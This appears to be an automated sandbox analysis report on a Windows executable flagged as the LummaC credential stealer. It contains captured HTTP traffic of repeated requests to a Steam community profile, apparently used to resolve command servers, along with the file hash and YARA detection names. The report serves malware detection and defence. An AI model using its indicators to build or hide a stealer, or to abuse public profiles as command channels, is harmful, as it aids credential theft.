                                                                                                                                                                                                                                      2025-03-13 15:40:32 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:32 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=dc1700330cc29ea6d894c6bc; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:32 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:32 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.849694104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:34 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:35 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:35 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=a56d3429ca48ac76cba2142b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:35 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:35 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.849695104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:37 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:38 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:38 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=f80c8acb02fc14bcdf2afd22; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7Ce71a092c3f52f423f0524b8e40ded237; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:38 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:38 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.849696104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:40 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:11:40:07
                                                                                                                                                                                                                                      Start date:13/03/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                      Imagebase:0x220000
                                                                                                                                                                                                                                      File size:2'111'488 bytes
                                                                                                                                                                                                                                      MD5 hash:6F5FD4F79167A7E2C0DB0A9F925118B4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      No disassembly